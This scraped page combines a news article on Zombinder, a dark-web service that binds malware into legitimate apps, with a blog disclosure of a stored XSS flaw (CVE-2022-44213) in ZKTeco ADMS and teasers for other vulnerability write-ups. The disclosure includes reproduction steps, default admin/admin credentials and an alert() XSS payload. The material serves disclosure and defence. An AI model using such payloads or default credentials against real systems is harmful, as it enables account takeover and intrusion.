Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of **Windows and Android malware**, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called **InTheBox** surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.

According to ThreatFabric’s **blog post**, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.

**What does Zombinder Do?**

In the campaign detected by ThreatFabric’s researchers, the service is distributing the **Xenomorph banking malware** disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.

At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded **the infected Windows app** were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that two downloaded buttons on the malicious website’s landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the **Ermac malware**.

**How to Stay Protected?**

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

1.  **Psst! tool lets users share passwords using a link**
2.  **Chinese Hackers Hiding Malware in Windows Logo**
3.  **Trojan Source attack lets hackers exploit source code**
4.  **Android apps on Play Store infected with Windows malware**
5.  **Spyware Vendor Exploited Chrome, Firefox and Windows 0-days**

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

ZKTeco Xiamen Information Technology ZKBio ECO ADMS <=3.1-164 is vulnerable to Cross Site Scripting (XSS).

**ZKT Eco ADMS - Stored XSS**

 Hi All,

I was able to identify stored XSS in one online attendance system i.e. ZKT Eco ADMS (v 3.1-164 )(Automatic Data Master Server) is a powerful web-based time and attendance management software. which is used to configure the attendance devices and manage its users.

Cve ID assigned CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213

Technical details

1.  Login to ZKT Eco ADMS (default admin/admin)
2.  Click on System and click on Employee
3.  Click on Append button to add new Employee
4.  In Emp Name field Add your XSS payload. For testing I have used a non malicious code **"/><img src=a onerror=alert('stored-XSS');>**
5.  Click on Submit button, it will redirect you to the employee list, and our payload will be executed.

_XSS payload embedded in EMP NAME field._

_our payload executed successfully._

XSS has been fixed in latest versions after 3.1-164.

**Popular posts from this blog**

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

**CSV Injection in Acunetix version 13.0.201217092**

 Hi all,  I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions which can lead to admin system compromise. For testing I used the Admin account. Lets get to the technical details. CVE ID Assigned:  CVE-2022-29315  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315 https://www.cve.org/CVERecord?id=CVE-2022-29315 Vulnerable Version: Before version 14 Fixed Version: 14 and 14+ # Software description: Acunetix by Invicti Security is an application security testing tool built to help small & mid-size organizations around the world take control of their web security. # Technical Details & Impact: It was observed that Target page is vulnerable to CSV Injection, using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilitie

Tag

#wifi